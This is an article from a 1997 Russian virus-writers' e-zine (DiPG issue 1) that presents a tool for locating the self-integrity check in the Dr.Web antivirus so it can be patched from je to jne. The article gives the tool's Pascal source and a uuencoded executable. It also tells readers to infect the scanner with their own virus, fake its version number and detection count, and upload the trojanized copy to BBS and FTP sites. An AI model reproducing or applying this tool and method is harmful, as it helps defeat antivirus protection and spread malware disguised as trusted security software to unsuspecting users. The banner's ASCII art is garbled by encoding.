��┌��─� ────┐ ��┌��─� ────┐
��│ � ┌��─��┐ ��│ �
Electr0nic magazine ��│ � ┌��─��┐ ��│ ��·[�
DiGiTAL iNf0RMaTi0n PiRATES Gr0UP��]·
� │ │ ��└� ─��┘ �
f0r H/P/V/Cr/Co � │ │ ��└� ─��┘ �
All S0FT Mu$T be FREE !
│ ��│ ��┌� ─┐ ��┌��┐ ��┐┌� ┬─��─��┐┌� ┬─��─��┐┌��┬� ─��─��┐ � │ ��│ ��┌� ─┐ ��┌� ┬─��─��┐┌��┬� ─┬��─��┐┌� ┬─��─��┐┌� ┐ ��┐┌��─� ┬┬��─��┐┌��┬� ──��┐┌� ┬─��─��┐
��│ ��└� ─┘ ��│ � ├┼──��┤├� ┼──��┤├� ┤ ��│� └┴─┬��┐ │ ��└� ─┘ ��│ ├� ┤ ��│├� ┤ ��│ │├� ┼──��┘├� ┤ ��│ ├� ┤ ├┼��─ ├� ┼─┬��┘
��└��─� ───��─��┘ ��└��┘ ┘� └��┘ ┘� └��┴��─� ─��┘└��─� ─┴��┘ └��─� ───��─��┘ � └��┴��─� ─��┘� └��┘ ┘ ┘� └��┘ � └��┴� ─��─��┘ ��└� ┘ ��└��┴� ─��─��┘� └��┘ └
�� ��Issue N~ 1 august 1997
��·∙��- � ─────────────────────────────────────────────────────────────────── ��-��∙·
"WEB - ИДИОТ" или "Способы распространения вируса"
Часть 1. "Игорю Данилову посвящается"
Привет всем вирмэйкерам ! Прочитав приложение для программиста WEB_YoU
опубликованное в Infected Moscow N~ 1 я заинтересовавшись таким вопросом
как самозащита в Dr.Web решил написать для своих друзей вирмэйкеров такую
приблуду. Приблуда эта ищет в файле DRWEB.EXE определенную последовательность
комманд и выдает смещение по которому находится магическая команда:
74xx je 0000xxxx
так вот заменив эту самую команду на
75xx jne 0000xxxx
Вы можете спокойно заражать своим новым вирусом самого паутиныча, изменить
в документации размер EXE файла и запаковав все это дело LZH спокойно заливать
на любую BBS или FTP (предварительно поправив в паутиныче номер версии на
более "свежий" и "увеличив" колличество обнаруживаемых вирусов).
Думаю Вам пригодится и понравится эта приблуда. Дальше идет исходник на Borland
Pascal 7.0 (для компиляции Вам понадобится модуль TpString.TPU входящий в
поставку библиотеки Turbo Professional), но если Вы не хотите его компилять
еще дальше идет UUE-кодированная сама утилита !
P.S. Не забудьте распаковать DRWEB.EXE командой "DRWEB.EXE DRWEB.EXE /UPW"
=================================================================================
Program Web_Idiot;
Uses Crt,TpString;
Var
F : File of Byte;
B: Byte;
Ab : array[1..12] of Byte;
i : Integer;
Begin
TextColor(8);
Writeln(' ■ Web - Idiot ■ (x) D()CT()r //DiPG ');
TextColor(15);
WriteLn(' Утилита поиска "самозащиты" Dr.Web ');
WriteLn(' проверено на версиях: 3.17, 3.18, 3.19, 3.20 ');
Writeln(' возможно будет работать на более поздних версиях ');
Assign(F,'drweb.exe'); { хендл файла }
Reset(F); { открываем на чтение }
While Not Eof(F) do {крутить цикл пока не конец файла }
begin {поиск в файле}
Read(F,B);
Write(' Смещение - ',HexW(FilePos(F)));GotoXy(1,WhereY); {тек.смещение}
if B=$80 then for i:=1 to 12 do
begin
Read(F,ab[i]);
end;
if (ab[1]=$3e) and (ab[4]=$01) and (ab[5]=$c6) and (ab[6]=06)
and (ab[9]=$00) and (ab[10]=$74) and (ab[11]=$03) then
begin { команда найдена }
WriteLn(#7,#7); WriteLn(' Смещение найдено - ',HexW(FilePos(F)-3));
Halt;
end;
FillChar(Ab,SizeOf(ab),0);
end;
Close(F);
TextColor(7);
End.
=============================================================================
section 1 of file web_idi.exe < uuencode by Dos Navigator >
filetime 582116603
begin 644 web_idi.exe
M35IO`0H``0`'`&0$__\W`0`"`````?#_4@````P!4$M,251%($-O<'(N(#$Y
M.3`M.3(@4$M705)%($EN8RX@06QL(%)I9VAT<R!297-E<G9E9`<``````0P`
M/P`2`"\$+Z2-`0!```#P````'````+A]!;HP`04``#L&`@!S&BT@`/J.T/LM
M&0".P%"YPP`S_U>^1`'\\Z7+M`FZ,@'-(<T@3F]T(&5N;W5G:"!M96UO<GDD
M_8S;4X/#+0/:C,V+PH#D#[$$B_+3YHO.T>E.3HO^*^@KV([%CMOSI?R.W0<&
MOP`!,_:ME;H0`.LLD*V5LA#K-:V5LA#K-JV5LA#K.ZV5LA#K7:V5LA#K7JV5
MLA#K7ZV5LA!R"*31[4IT]'/X,\DSV]'M2G3%T=/1[4ITQ-'3A=MT%]'M2G2_
MT=.`^P9R"]'M2G4$K96R$-'3+HJ/7@&`^0IT=#/;@_D"="K1[4ITG7(CT>U*
M=)S1T]'M2G2;T=/1[4IU!*V5LA#1TX#[`G,5+HJ_;@&LBMA6B_<K\_KS)J3[
M7NN!T>U*=02ME;(0T=.`^PARV]'M2G4$K96R$-'3@/L7<LO1[4IU!*V5LA#1
MTX'CWP"&W^N]K`+(@-4`//]U@EN+ZX/#$#/`K)'C#JT#PX[`K9<F`1WB^>OL
MK0/#^H[0K8O@^ZT#V%.M4([%CMTSP(O8B\B+T(OHB_"+^,L#``(*!`4`````
M```&!P@)`0(```,$!08```````````<("0H+#`T``````````(`[(/X@5V5B
M("T@261I;W3L``X&`2AX*2!$*"D*H$-4!'(@+R]31U=7```&1&E01R`D()/B
MJ*NHXJ"@`""OKJCAJ@<BX:"LKJ>*8J#I$^LB-'(N*@!9+AW@KJ*EX*6MKBH!
M(*TC"N&H[^4Z(#!M,RXQ-RP&.`83JCD&,C`@,B)*`D)%IBZAXZ2EXE#,(."@
MH:YBXNP]0H(*JZ6E;:>DK:CE%Q1+(`ED<G=I+@"E97AE#2"1K*7I:JA2+R71
M%``./&8!J:2!%9H``)L``*":#0`Y`%6)Y;@``9K-`BA0$('L"6H(FF,"0*$6
MOP@"'E>_)0Y7:DA2)P$'+-T%!9'2]29J#P$B/`HB4]<;81`;D$F)"QMB`!O#
M&YHN!UO1#VJ9:0=Q`P(@FAH+#PC`=`/I3I-0`3;B&QX(0M<6@\0$`6C-@9,`
M:(V^`/\65T3H"EN`1%`',P#77XK^XK(D=E?B'A\&@`4`/EV`=2_'!O```0#K
M!+DI_PA&BSX)=(F!Q^,&>8,7#'790DHVY``^H9Y`E1+G.0J4"N@`*9'&"HH*
MZ0`&4E$*@`KL@W5YH,`'[0!T=7('[@`#=6LFR;UJ!YA[!HZW00D&1MNG]!7>
M+0..V@7D'Z1#,<":%@%*Y`$I9@P?F(#36>F:_D3J@UIU?7#_[<DO00`!-L1^
M"";&!02*`#!&!S#DP>@$B_B*A0(`D505B$4!%20/%U>Z`A0"%`8'*0/LL!4&
M*03)R@+()I;_`'1=PTD%#>@H]0&:#N@@&Q<#"9ID`XI-"!,-`PF::0(`$UW+
MM`_HU`4\!W0*/`-``78&N`,`Z%4#GP"T"#(``/_HO`6*Q"1_H@0!HOH`,\!0
M`*+U`*(%"P8!0*+T`(X*@`943VP`)HH%)CH%=/ND``BY_S$_`K@W`)&``O?0
M,]+W\:,`=PX?NCB`"0&X&R7-(1_#,B:`)B2`AP#^;08\!'("L`-0M`)`;%<%
M6`KD="VX$A&S`10-2@6X,!&W`+(*0*!4!8#Z*G46,@XR%0!#`[D`!N@L!;02
MLY!X(.@E!<.U'P50%4`L%$.Q``K2=0BR&`%0Q7<"L0&*\HK4_LH``%V`_AAV
M`K0!H_@`B18"`8B@B@[W`,8&]DS,H_P$@!+^`,-0'KA7`8[8@#Y"%=(`=`4=
MW0%4P1]8SP\(`'4!PU14$``_S1:P%0!,!NOTL%[H'0.P0P``Z!@#Z`X#Z8G^
MB]PVBT<$Z(6%(_IM_Z`G0**,%8I7"B@*!'<(!$\&!&\$@`(ZT7<G.O5W(Y-X
M'_[.H`!X&_[).@Z/=Q/^S3HNI5(#"`N+CPX!A8_H00/*"`#M!HH^HB1*BPX5
MBZ3HJ@HV!`<+]@/+O$SH&@,=RHH;0`$;!,NX`0?K%@$&4.C]IF0"6!N*.(KN
M`M0Z.NYU`C+`Z/8Y3DJ3BW<$@P(B*4UR%SH@=Q&-%%0"-OT."3HV_PY!`=3"
M`LH$5;4"BL(J12D&)?[`<:D,9<[&#/T,1`*@[*CP=`0D#PR`@";P%VIP"`;Q
M&B0PW0>Q!-+@&(\3BA@,]\N`#@8(RP,3'D6+5S!(!`O2=!,/,_^P`#CH``'H
M!@!*4B%U]C.[@$MU_8@)4^'UPRQ?!+@``-TTNA(`.]-S&O?SB]CD8:@```-U
M"`P#YF&PMN9#BL/F0HJ51<<$.1DD_!4!%6T^!;H#0`BTL`!T`K`!%0EY$<8&
M%0K`=52B$C+D%P@*B"801!$*Y'6!Z!/^`DJ4'C;%?P3'11#7@0(%!(``C84$
MB44,C`H`70X/$&<#C$T2QD4P`($;'QPKN)\`D`.[?02+RX%]`K'7=`I02CJR
MU[A,$=@V%$%!+A:)71@&&HE-'&$"!AXSP#A5B^S$?D`5!B:+501*2@:@)K!!
MQ'T,,]N8#NA<_[D!``<\"'0T/!-T,#P$=$1)```\&W0G/`%T(SP&=#<\&G1&
M```\#71//"!RSSO:=,LFB`%#``#HF``[WG;`B_/KO`O;=+BP@"H(Z(<`L"#H
M@@4*0(%]`$OBZNND('2@)HH!!(`VF>AJ`$/B[^N1@#[UH`GEBD'K"N@`64X`
M)L<!#0I#0YFJBJ4FNI6X"EU-E>4VQ.2G35+,$BD$XQFM$B8\]G@+``"OZ!P`
M1^+WZP/HG`!4;NC6_#HQ!2@(L`WH`@4*4U%2(D2+<@!8Y2I*`-4MO#,\"G0U
MM`F*F(`>^@`R[%+H8P%:_L)!!(-V((H!5(_K%[0.Z$\!ZQ,3`;L-=`W^RNL)
M%Q2`90AE+0`'6EE;P_[&0:BE=AC^SF)@$^\#(@4%%$]9P[0#7>D*`1)(M`('
M`P$>CAY4'4"F4``?B]J+][B0(323D"R,E#E'&\6!/.AN0:'_AE1P+.AB`%X'
M%-B-P@!2ZQSH4P`2!9(3D@_H1BAY_^N8J@?H/@`M1U;`EEKBIN@P`&N)H$!K
MBL;V)DKC]@/"B\@!17MC`+`.[NL5Q4)B*@9*L`\,P0R@`!_#._=T8V97'@:+
MSRN;#<X]BL<Y_P/#F$#1X(OX.X/"!H`^20$4^A^A6@!U`Z%8(QXF`/<`]`8?
MCL#\"MMT%@`)K(K8[*@!=?OZ!G3[BP!0PZO[XNSK!HKGK*OB_`(`-U\15E=5
M!LT0!R`475]>PP"ZYMJ,```&2``S[>B>"^B@`(O$!1,`H`"Q!-/HC-*OHQH`
MHQP`E%(#!A0''@,H2E@#+`,TXZ$*+R:A`@OCQP9`.#H`U@",#CQ#`R@`OCD"
MN3R0_"ZLM#7-(0"&B1V,10*#QP3B[PD+[@RKHTSNNA,((PB8RML`N"0(!!`_
M<.$&N`J@C%`"N&,"#E`.Z$Y0N@;HR`(4`@$4.@0`%+D"RS/`G%N`YP]3G0#@
MG%F`Y?"`_?!T#D"`S_`6CA!TA%P`PV`!>9_[@\0&6```@^<?@<>6`(#\.7,#
MO___5PH`M%1MB^R`3A8!6%M96H"(7E]='P?/N-#"@'8&+<@`65OK!PBP,#/)
M,]L``!K[HT(`B\$+PW0]H8`R(``+P'0OCL#Z$`%`"ALKPW<7]]@]`!!S$+H!
M@!+WX@/!<@<F.P8(`'(&`D`C%`#KT8O(C,,K'D@!`%SK$(D.1`")'D8`Q!X^
MI/``C,!/$VJB0`NC0`-,`+AN`6&AX`93RP.<1>0J^`DA`@,$!%0E'L45!B@J
M4_"A4`H4"P90="F[3`(R``5*H:;H,@"[6PP>!8L,CUBP.@A)KR;H-2F3%V`7
M!R.T3(("/RZ*!PJ]!N@X`"`)0^OSP[%D&K$*`9"AZP0RY/;Q!#!0H"A"6(K$
MPU`$Z`$*82A0N^CH`PD*@"0/'#PZ<@($!XK0M`8"`$C#``(;(2,D-#4V-S@`
M`#DZ.SP]/C]U4G5N=&EM92``"F5R<F]R(``@870%+@U4`0H`4`X8;VYS($-`
M`6]P>7)I9V@8*&,I(#&``CDX,RPY,B!"'VQA;F0`%3/`AP9,`,N#/@6!`F/+
MH0?I</Z+`%#T-HY$`B8[50)_!WP42%0(!7(/#09\"`^A*`A%!'<HN,DH*!1(
M_KC7!D+^!95R`$@-*\1S"??8.P9*`'(>!8;*&"K^NC/2`4*AQ'\(-L5W!*&0
MG*NXL-<$@`"K!9(+`8U%=*N,%`$*,@$$FQ2Y#@#SJ[D`@$\`"])U":PZR'8$
MBLCC"*P`0#@#JN+X,L"J'X1EC48(#0KFDU(C!`@&"`R&\0@O10X8`#E%"LH*
M`+JQU^L4/`BZL@4#NK/7AG#R10(](PJ%$CT7=`T]CG00QP0B_F8`ZR12!F'6
MBB4`6D/W"Z5'NQ``Z"!TE@\YCE/ACK`L]^''3V::<1@(40@*"DQG(!A0NQ0W
M%0")HEB[#+L<"PH`5R$`0&<")O\9*(C+`X5?!\,#A2//Q54,L##DZ,#,';0_
MS2%R$'^-JN4Y]5FE[`I(7>Y#>`$P,\DFAQ9*%#)`,@<KP52X7^AE&0N.\"4"
M`3C`5!V#^P1V!K0^F0<:&96D"#72?]IU+A2`(G<[.W<*="L>!E-2D@!/5Z1?
M"@<#V@/R`*K\_]`K\HS"6P<?J@H#)=!U",,BA0!HQ14J3B[H,P$<U(OX6$1U
MO,/35%Y`7K)*`EXY&D^$?P@KSRL``-%S!`/*,](&)L1W#`/^L""@JOSSJBO^
M!UH="DD[J74)4E'B``G:45H=R-QN:6D`3TA/7:I!`4_!3\C1I)2UCMI37U/[
MPKY1I"O[K2$E4PU04E95C55>TCM:6,#`5P`*W5X&N+L%D.CN`##^=0HF@W\:
M`'0#Z'``(%S!K*X,1)`&$3OS=?.*@B7#"'0)%0IT`4Z"%W'#N-`%0`(`@&Z^
M8`",VNA8_P!#+9^G0R$4"K/LQ1L2&X*+DB;_7Q2V-Q[##[email protected]_,W+3@^@)FB
M)_'`O-`*=1#HPO\8J9`0=!,[%8S(_'==RP'8F[`:Z_04Q7T*B_Q*?G5M_NF"
M4BE$)3TC-4-/HA<]BD8"B=1!_SOZ=08VZ%__>>"E*`:*2PRXZ0:+3@-^"`)$
M5`I'Z+W]B\>#L@DKQTBJ*P8@`"X/[email protected]`&\^#RXP4MPW9!*#M;B@<RY"9`
M0XXKT'X%4.C=_4"9BG2>=C";34;H'?Y$#(9J2#`6&`H*,*!>`+0]0.L&<"2X
M`#RZ`?E#0@BP3)?\&@BSA+*X!#10M``%#%I8)H!],`"$`'02'HU5,`8?,\D3
MP`!S!H/K$9*0`LHT)HD%BT/-1GL$H4/"3@@YW74.;L3`:G.S)Y%JN,2F=1=O
M"9!];Q_HD!;<TZ&)!J`40<.T/[ID;`5'NB<`9;(*Z-S_=1L>4L4N+58&)$)`
MR5H?<@8[P72(PDH!3):S/[DVW"BS0+DV$.BF-B4`/Z@*4QP>4:"P)O=E!(O(
M0PR*XU4I05E!V](60E%U!,N,P@L2!8`%U^L<.S%T%XDS_P[N6AQARAD%:`ZK
ME))*7"%<"',@5@TA<0D#RHO07+@`0I<8XC`(A`,D7"$;9L'@$"BF9@^LT`7!
MX0G9H@`%]^D(I,(0RXOP`*"+^O?A4%*+QO?CB]B+QPIP#%):6`/3`]'+ZE`]
M)P@]=%YFF;!30?EFB\I$!<L!`$E5,^T+TGD(1??8@](`HD#WVHT^>0M%H4H/
MV8/3#PTS@:J[\8O[,]LTIP(HS[T0`-'@T=+1`0``TT`KSAO?<P5(`\X3WTUU
MZ8A(7>L679;I9P&5C_>3DO?QDP,*;C/3.='M<PA-Y79%*`=G70,`I@8/K=#3
MZLN#X1]T!M'PP^K1V.+Z&:7"T^"=>1ES&57`NC/)B0VX`#WAX$@-L`+_!2`6
M"@*T/`7#@@F!`%:<6HD%N`L$NILZ#2(M+R@P9T0<]L*`N&`#V!N%VG44H?`_
M3BL`N#NN%C$0#4`+B546B4T8B5T:$4T1'(!@'BZG'PXSTE*`)T\"MBV`,2IU
M<YDA@<!U)PN4S8V5&+DZ7`.<<WB!*U8[V'0@@`0@%!IT`T/K\HO3*]"&>W)&
M#H%/!</H1`"(03NS5,&#^0'\-0[H+?[H%-0M%Q.JVXO!-0,;$@I`&Q(;"RO!
M&]-R!;`!\H@0,L!%!D-()G4KU(.2TF8!:E)0=U(.>%M9\XP05;5ZR*91%('-
M^6F,VE!300I+-C@`*_P[]W,'`_$#^8"(3D_]\Z3\CMI;&C1I"!X&?7A#A7!,
MP`!54P>Y5`,KS]'I2HP)%*O#0C`QC@0R,X=!0D/HZ$1%1@`'`?__`"*4B`$0
M0`2@A4A?NP`"`+T!OP,!_S0``/,`^``#`0X!'P$D`2D!,`%!`48!2P%<`6$!
M9@%W`7P!@0&0`9P!H0&K`;`!Q@'.`=\![P'T`?H!`0(&`@L"$@(8`C\"1P*9
M`J("IP*L`KT"S0+2`MX"Y0+J`N\"]@($`Q$#%@,=`R4#!#D`"0`D`#<`.P$'
9FP`!`!L!$`,V"E$*9PJ&"@"-`0!```#P````
`
end
sum -r/size 7259/6886 section (from "begin" to "end")
sum -r/size 191/4975 entire input file
─────────────────────────────────────────────────────────────────────────────
written D()CT()r [c] D.i.P.G.
�
